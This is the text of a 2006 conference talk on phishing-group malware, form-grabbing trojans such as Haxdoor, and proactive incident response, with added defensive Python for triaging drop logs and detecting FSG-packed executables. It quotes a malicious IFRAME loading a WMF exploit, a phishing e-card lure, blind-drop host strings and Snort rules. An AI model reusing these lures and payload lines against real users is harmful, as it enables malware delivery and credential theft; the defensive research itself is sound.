Shmoocon ’06
Lance James, Secure Science Corporation
Trojans & Botnets & Malware, Oh My!
What is this talk about?
• Malware
  • In regards to incident response
  • Pre-emptive Techniques
  • Research & Development
  • Related mainly to theft-intended malware
• What is Malware?
  • Malicious Software/Hardware
  • Designed to be harmful
Cyber Attack Sophistication Continues To Evolve
[Chart, Source: CERT. Axes: Attack Sophistication (Low to High) and Intruder Knowledge, plotted over 1980, 1985, 1990, 1995 and 2000+. Techniques labelled on the chart: password guessing, self-replicating code, password cracking, exploiting known vulnerabilities, disabling audits, back doors, hijacking sessions, burglaries, sniffers, sweepers, network mgmt. diagnostics, GUI tools, automated probes/scans, packet spoofing, denial of service, www attacks, distributed attack tools, “stealth” / advanced scanning techniques, staged attack, cross site scripting, bots.]
And Continue To Grow…
• 85% of respondents had breaches — CSI/FBI survey
• Avg reported loss from attacks was $2.7M per incident — CSI/FBI survey
• 85% of the critical infrastructure is owned or operated by the private sector
• 137,000 security incidents in 2003, nearly twice as many as in 2002 — CERT
• Data theft grew more than 650% over the past 3 years — CSI/FBI
Source: Carnegie Mellon
Growth Or Liability?
• Over twenty per cent of Internet users now access online banking services.
• This total will reach 33% by 2006, according to The Online Banking Report.
• By 2010, over 55 million US households will use online banking and ePayments services, which are tipped as "growth areas".
• Wamu buys Providian, BofA buys MBNA
• And so what about the ‘Phishing’ threat to e-commerce?
Source: ePaynews
What Is Phishing?
• Phishing, also referred to as brand spoofing, is a variation on “fishing”: bait is thrown out in the hope that, while most will ignore it, some will be tempted into biting.
• Phishing is the act of sending a communication to a user, falsely claiming to be an established legitimate enterprise, in an attempt to scam the user into surrendering private information that will be used for identity theft.
• The communication (usually email) directs the user to visit a Web site where they are asked to update personal information, such as passwords and credit card, social security, and bank account numbers, that the legitimate organization already has.
• The Web site, however, is bogus or hostile and set up only to steal the user’s information.
What’s Worse?
• Email phish or phishing malware?
• Some of the larger phishing groups have associations with both phishing emails and key-logging malware.
• While phishing email is very effective, the number of victims is significantly smaller than the number of victims of phishing malware.
• Logs recovered from base camps for phishing emails and malware show a startling difference.
Email –vs- Malware

Average number of accounts compromised in a week
  Phishing Emails: 100
  Phishing Malware / Keyloggers: 500,000

Type of information compromised
  Phishing Emails: Name, address, phone, SSN, credit card, VCC2, bank account numbers, logins and passwords, and even items such as mother’s maiden name or the answer to the “forgot your password” prompt. Generally, victims provide all of the information asked.
  Phishing Malware / Keyloggers: Account login, or credit card number with expiration and address. Generally, a single victim only loses a single piece of information. Few victims lose more than one type of information, and the information compromised may not match the information desired by the phisher.

Volume of data generated
  Phishing Emails: Each victim = < 500 bytes of data; 1 week = < 50 Kbytes. A single person can process the data in minutes.
  Phishing Malware / Keyloggers: A single key-logging Trojan can generate hundreds of megabytes of data in a week. The data is not processed by hand; instead, scripts are used to filter the information. Potentially valuable information is frequently ignored due to the filtering process.
Email –vs- Malware (cont.)

How often is the method viable?
  Phishing Emails: Reused regularly for weeks or months before requiring a change. Due to simple changes in the mailing list, a variety of people can be solicited – information is almost never collected from the same person twice.
  Phishing Malware / Keyloggers: Most malware is effective for a week before anti-virus vendors develop signatures. Some phishing groups use malware in limited distributions; while these programs may exist for much longer durations, they generally collect less information. A single person that is infected may compromise the same information multiple times.

Total development cost to the phishers?
  Phishing Emails: A single phishing server may take one week to develop. The server may then be applied to hundreds of blind drop servers and reused for weeks or longer. Changes to the phishing email content (bait) can be measured in hours and may not need a change to the phishing server.
  Phishing Malware / Keyloggers: A single malware system, including Trojan and receiving server, may take months to develop. Each variant may take a week or longer to develop. When generic anti-virus signatures appear, redevelopment may take weeks or months.
Phishing Malware (cont.)
• In November of 2003, the concept of a single mega-virus changed.
• Gaobot, followed by Sasser and Berbew, took a different tack: rather than one mega-worm, these consisted of hundreds of variants – each slightly different.
• The goal of a variant was not to become a mega-worm, but rather to infect a small group of systems.
Phishing Malware (cont.)
• This approach provided two key benefits to the malware authors:
  • Limited distribution; limited detection. As long as the malware is not widespread, the anti-virus vendors are less likely to detect it. (If Norton doesn’t know about a virus, then they cannot create a detection signature for it.)
    • Over the last 12 months Secure Science Corporation has identified dozens of virus variants used by phishers, carders, and generic malware authors that are not detected by anti-virus software.
  • Rapid deployment. Nearly a hundred variants of Sasser were identified in less than three months. Each variant requires a different detection signature. The rapid modification and deployment ensures that anti-virus vendors overtax their available resources, becoming less responsive to new strains. It also ensures that some variants will not be detected.
Phishing Malware (cont.)
• We’re seeing a significant increase in malware used by phishing groups.
  • IE exploitation via ActiveX
  • Blended threats
• Let’s take a closer look at the malware, and the threat model behind phishers and their malware.
  • Malware key-logging myths
Phishing Malware (cont.)
• A few phishing groups have been associated with specific malware.
• The malware is used for a variety of purposes:
  • Compromising hosts for operating the phishing server;
  • Compromising hosts for relaying the bulk mailing;
  • Directly attacking clients with key-logging software.
• A single piece of malware may serve any or all of these purposes.
Malware Trends
• In early 2004, the malware associated with phishing groups rarely appeared to be created specifically for phishing. Instead, it was focused on botnet* attributes:
  • Email relay. The software opens network services that can be used to relay email anonymously. This is valuable to phishers, and spammers in general.
  • Data mining. The malware frequently contains built-in functions for gathering information from the local system. The gathering usually focuses on software licenses (for game players, warez, or serialz dealers**) and the Internet Explorer cache. The latter may contain information such as logins. For phishers, this type of data mining primarily focuses on account logins to phishing targets.
* A compromised system with remote control capabilities is a “bot”. A “botnet” is a collection of these compromised hosts.
** Illegally distributed software applications (warez) and the associated license keys (serialz) are frequently available and propagated through the underground software community.
Malware Trends (cont.)
• Remote control. The malware usually has backdoor capabilities. This permits a remote user to control and access the compromised host. For a phisher, there is little advantage to having a backdoor to a system unless they plan to use the server for hosting a phishing site. But for other people, such as virus writers or botnet farmers*, remote control is an essential attribute.
* A “botnet farmer” is an individual or group that manages and maintains one or more botnets. The botnet farmers generate revenue by selling systems or CPU time to other people. Essentially, the botnet becomes a large timeshare computer network.
Malware Trends (cont.)
• By Q3 of 2004, a few large phishing groups had evolved to support their own specific malware.
• While the malware did contain email relays, data mining functions, and remote control services, these had been tuned to support phishing specifically.
• Viruses such as W32.Spybot.Worm included specific code to harvest bank information from compromised hosts.
Malware Trends (cont.)
• A few phishing groups also appeared associated with key-logging software.
• While not true “key logging”, these applications capture data submitted (posted) to web servers.
• A true key logger would generate massive amounts of data, and it would be difficult for an automated system to identify account and login information in it.
Malware Trends (cont.)
• Instead, these applications hook into Internet Explorer’s (IE) form submission system.
• All data from the submitted form is relayed to a blind drop operated by the phishers.
• The logs contain information about the infected system, as well as the URL and submitted form values.
• More importantly, the malware intercepts the data before it enters any secure network tunnel, such as SSL or HTTPS.
Malware Trends (cont.)
• Examples of data output:
  • Recent examples of HaxDoor, Berbew and PWS.Banker reveal similar “formgrabbing”:
    reason=&Access_ID=xxxxxxxx&Access_ID_1=&Current_Passcode=xxxxxxx&acct=&pswd=&from=homepage&Customer_Type=MODEL&pmbutton=false&pmloginid=&dltoken=&id=*******&state=MA&pc=*******
    onlineid.bankofamerica.com/cgi-bin/sso.login.controller
    [11023586123662948896]
    [IP:xxx.xxx.xxx.xxx 13.09.2005 8:26:32]
• Distributed through IE Class-ID attacks
  • ADB/CHM
  • IFRAME tag
  • Javaprxy???
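As an added example (not from the talk), a triage script for recovered drop logs in the four-line shape shown above: it separates records, pulls out the target host, path, bot ID, victim IP and timestamp that an institution needs for notification, and masks credential values so the recovered data is not re-exposed during analysis. The secret-field name pattern and the sample records are constructed assumptions, not recovered data.

```python
import re
from datetime import datetime
from urllib.parse import parse_qsl

# Form field names whose values are secrets; they are masked before the record
# leaves the triage script, so analysts work from field names, not credentials.
SECRET_FIELDS = re.compile(r"pass|pswd|passcode|pin|cvv|vcc|ssn", re.IGNORECASE)

# Constructed sample in the four-line shape shown on the slide: URL-encoded form
# body, target URL, bot identifier, then victim IP and timestamp. All values
# are placeholders (TEST-NET addresses, made-up logins), not recovered data.
SAMPLE_LOG = """\
reason=&Access_ID=user1234&Access_ID_1=&Current_Passcode=hunter2&from=homepage&state=MA
onlineid.bankofamerica.com/cgi-bin/sso.login.controller
[11023586123662948896]
[IP:192.0.2.10 13.09.2005 8:26:32]
user=bob&pass=secret&submit=Login
shop.example.test/login.php
[11023586123662948897]
[IP:198.51.100.7 14.09.2005 22:01:05]
"""

BOT_ID = re.compile(r"^\[(\d+)\]$")
IP_STAMP = re.compile(r"^\[IP:(\S+) (\d{2}\.\d{2}\.\d{4} \d{1,2}:\d{2}:\d{2})\]$")


def parse_formgrab_log(text):
    """Split a drop log into records, masking secret values as they are read."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    records = []
    for i in range(0, len(lines) - 3, 4):
        body, url, bot_line, ip_line = lines[i:i + 4]
        bot, stamp = BOT_ID.match(bot_line), IP_STAMP.match(ip_line)
        if not (bot and stamp):
            continue  # malformed record: skip it rather than mis-attribute data
        host, _, path = url.partition("/")
        fields = {}
        for name, value in parse_qsl(body, keep_blank_values=True):
            fields[name] = "*" * len(value) if SECRET_FIELDS.search(name) else value
        records.append({
            "host": host.lower(),
            "path": "/" + path,
            "bot_id": bot.group(1),
            "victim_ip": stamp.group(1),
            "seen": datetime.strptime(stamp.group(2), "%d.%m.%Y %H:%M:%S"),
            "fields": fields,
            "credential_fields": [n for n in fields if SECRET_FIELDS.search(n)],
        })
    return records


def records_for_institution(records, host_suffix):
    """Select the records one institution needs to lock or re-verify accounts."""
    suffix = host_suffix.lower()
    return [r for r in records if r["host"] == suffix or r["host"].endswith("." + suffix)]
```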
Side-Bar, Case Example
• Anti-Malware Snake-Oil
  • Virtual keyboards
  • Keyboard logging protection
  • Scramble pads
  • Anti-spyware desktop software
• 99% of information theft malware doesn’t log key strokes! (It’s unscalable.)
Malware Trends (cont.)
• The end of 2004 showed a significant modification to the malware used by some phishing groups.
  • The prior key-logging systems generated gigabytes of data in a very short time. This made data mining difficult, since only a few sites were of interest to the phishers.
• By the end of 2004 and into 2005, the phishers had evolved their software.
  • Loggers focus on specific URLs, such as the web logins to Citibank and Bank of America.
  • It is believed that this was intended to pre-filter the data collected by the malware. Rather than collecting all of the submitted data, only submitted data of interest was collected.
  • More importantly, multiple viruses appeared with this capability – indicating that multiple phishing groups evolved at the same time. This strongly suggests that malware developers associated with phishers are in communication or have a common influencing source.
Malware Trends (cont.)
• PG02 significant attack pattern identified
  • Cpanel (WebISP in a box) exploitation
    • System compromise
    • Payload launch
      • www.site.com/images/newex.html
  • Hijacks network or box for spamming
    • Sending spam
      • Uses DMS generation 2
    • Enabling anonymity
      • Uses dark IP space for forged Received header
  • Object class exploits for IE
    • Trojan downloader payload
      • Classifies malware as “MSITS.exe”
        • Reference to MS-ITS protocol attacks
    • Uses GPL code from www.edup.tudelft.nl/~bjwever/
      • Berend-Jan Wever website
Malware Trends (cont.)
• Object class attacks not “brand new”
  • Uses older ADB exploit even though newer attacks exist
• January–February 2005 Haxdoor variants existed for Win98
  • Suggests targeting an “End of Life” product
    • Win98 EOL on security upgrades
    • No education on phishing
    • No SP2, no built-in pop-up blockers
• Evolutionary pattern
  • Suggests path of least resistance
  • Evolve when necessary
  • Win98 is plentiful and the best target! Why move?
Latest Threats
• WMF exploit
  • Discovered by Dan Hubbard (WebSense)
  • Found in the wild as a 0-day
  • Phishers were using it from Day 0
  • It was supposed to be patched in November
    • MS05-053
• Nuclear Grabber used by Phishing Group #02
  • Written by Corpse (author of A-311 Death and Nuclear Grabber)
  • AV vendors call it Haxdoor
  • Sells software on Corpsespyware.net from $250.00 to $2500.00
    • Russian sales only
Phishing Trends (cont.)
• Serial pattern for process of Haxdoor
  • Successor to Berbew malware from 2004
  • Very likely related to the original Berbew authors
    • ’05 Berbew marked with Corpse’s signature
• Haxdoor malware written in Assembly
  • Trojan creation kit
    • Compiles with permutations
    • Packed with FSG
  • Easy for phishers to compile on the fly with customized settings.
Latest Threats
• Email from Phishing Group for WMF exploit:

  Dear Friend,

  Friends [ fromfriends at aol.com ] has sent you an e-card from <A href="http://123Greetings.com">123Greetings.com</A> .

  <A href="http://123Greetings.com">123Greetings.com</A> is all about touching lives, bridging distances, healing rifts and building bonds. We have a gallery of e-cards for almost every occasion of life. Express yourself to your friends and family by sending Free e-cards from our site with your choice of colors, words and music.

  Your e-card will be available with us for the next 30 days. If you wish to keep the e-card longer, you may save it on your computer or take a print.

  To view your e-card, choose from any of the following options:

  <a href=http://www.123greetings.com/NY2006z3 target=_blank><table><tr><td><a href="http://mujergorda.bitacoras.com/base/index.html">http://www.123greetings.com/NY2006z3</td></tr></table></a>
What AV does with this?
• Identify the threat, label it - Here’s their analysis
Problem?
• Problem exists here
  • Labeled low threat based on AV metrics
  • Shoved in with the rest of the Trojan.small.em
  • No known resolve other than desktop prevention
  • Very reactive (as we all know)
  • Evolving malware disables AV (common knowledge)
• How do we change this?
  • Change the AV metric
  • Use common sense
  • Proactive, not reactive
  • Serial pattern analysis with common sense is key
Incident Response
• Emerging threats
  • Management by objective
    • Per incident basis
  • Threat modelling necessary (but usually never happens)
• Malware author grouping
  • Serial pattern
  • Pre-emptive signatures
    • Forces them to evolve (ROI lowers)
  • Possible apprehension
R&D + IR = Proactive
• Research for Haxdoor
  • <IFRAME src="http://imkportedoor.com/images/ny.wmf" frameborder=0 vspace=0 hspace=0 marginwidth=0 marginheight=0 width=0 height=0 scrolling=no> </IFRAME>
  • Grabs msits.exe from www.site.com/images/msits.exe
  • Packed with FSG (marked with Corpse signature within packing)
    003C1BD1  PUSH ies4dll.003C1165   ASCII "www.pcpeek-webcam-sex.com"
    003C1BE0  PUSH ies4dll.003C11C9   ASCII "images/data.php"
  • Blind drop identified
  • Data recovered in real time
  • Phishing the Phishers
Impact DOA
• Blind drop log monitoring
  • Data returned to the institution that’s compromised
  • Real-time risk mitigation
• Pre-emptive action
  • What do we know?
    • Packed with FSG
      • How many non-malicious executables are packed with FSG?
    • Talks to /images/data.php
      • Some versions /images/dat7.php and /images/bsrv.php
    • Group titles it msits.exe and msys.exe
• Bleeding-Edge Snort
  alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"BLEEDING-EDGE MALWARE Corpsepsyware.net - PG 02 Inbound"; flow:from_server,established; content:"|4D 5A|"; content:"|50 45 00 00 4C 01 02 00 46 53 47 21|"; distance:10; classtype:trojan-activity; reference:url,www.securityfocus.com/infocus/1745; sid:2002773; rev:2;)
  alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE MALWARE Corpsespyware.net - PG 02 Outbound"; flow:to_server,established; content:"|4D 5A|"; content:"|50 45 00 00 4C 01 02 00 46 53 47 21|"; distance:10; classtype:trojan-activity; reference:url,www.securityfocus.com/infocus/1745; sid:2002772; rev:1;)
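To make the two Bleeding-Edge rules concrete, this added example (not from the talk or the Bleeding-Edge project) decodes what the hex content matches against the PE/COFF header layout and applies the same check to a file offline, both as the rule's loose pattern match and as a header-anchored check; the sample headers are constructed. As the slide's own question notes, the stamp identifies the packer, not maliciousness, so the result is a triage indicator rather than a verdict.

```python
import struct

# The byte sequence the Bleeding-Edge rules match after the "MZ" stub:
# PE signature, Machine = 0x014C (i386), NumberOfSections = 2, and the COFF
# TimeDateStamp field holding the ASCII tag "FSG!" instead of a timestamp.
RULE_CONTENT = bytes.fromhex("50450000" "4C01" "0200" "46534721")


def fsg_packed(data):
    """True when the PE header reached via e_lfanew carries the FSG stamp.

    Following e_lfanew ties the check to the real COFF header, so the pattern
    merely appearing in a resource or data section does not count.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew < 0x40 or e_lfanew + 12 > len(data):
        return False  # header offset points outside the file
    signature = data[e_lfanew:e_lfanew + 4]
    machine, nsections = struct.unpack_from("<HH", data, e_lfanew + 4)
    stamp = data[e_lfanew + 8:e_lfanew + 12]
    return (signature == b"PE\0\0" and machine == 0x014C
            and nsections == 2 and stamp == b"FSG!")


def snort_rule_would_fire(data):
    """Approximate the rule's content/distance logic: first "MZ" anywhere in the
    buffer, then RULE_CONTENT starting at least 10 bytes after that match ends."""
    mz = data.find(b"MZ")
    return mz != -1 and data.find(RULE_CONTENT, mz + 2 + 10) != -1


def build_stub(stamp, nsections=2):
    """Construct a minimal MZ/PE header for testing (not a runnable executable)."""
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)  # e_lfanew: COFF header at 0x80
    coff = b"PE\0\0" + struct.pack("<HH", 0x014C, nsections) + stamp
    return bytes(dos) + coff + bytes(0x20)


if __name__ == "__main__":
    # Two verdicts on a constructed FSG-stamped stub and on one with an ordinary
    # timestamp; neither verdict says anything about maliciousness by itself.
    samples = (("fsg", build_stub(b"FSG!")), ("plain", build_stub(b"\xf1\xa2\xc0\x43")))
    for label, sample in samples:
        print(label, fsg_packed(sample), snort_rule_would_fire(sample))
```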
Outcome
• Snort sigs
  • Prevent a large amount of new phishing malware
  • Corpse has to change his method
  • Many other phishing malware packed the same way
• Problem response vs incident response
  • Look at the overall problem
  • Example: form grabbing
    • Assume everyone is infected
    • How do we solve this?
So you’re not an RCE
• Tricks for IR
  • IEHTTPHEADERS
    • BHO and IE hooks
    • Uses IE as agent
  • Locate blind drop
    • Monitor and mitigate
  • VMware
    • Sandbox (with snapshots)
  • Tools like Sysinternals, OllyDbg, Winpooch
  • Joe Stewart has some new tools for sandnet
• As it becomes more prevalent
  • More tools available for the common response team
• Common sense is sometimes the best weapon
Contact Info
Secure Science Corporation
7770 Regents Rd. Suite 113-535
San Diego, CA 92122-1967
(877) 570-0455
http://www.securescience.net
Email: info@securescience.net
Lance James ~ CTO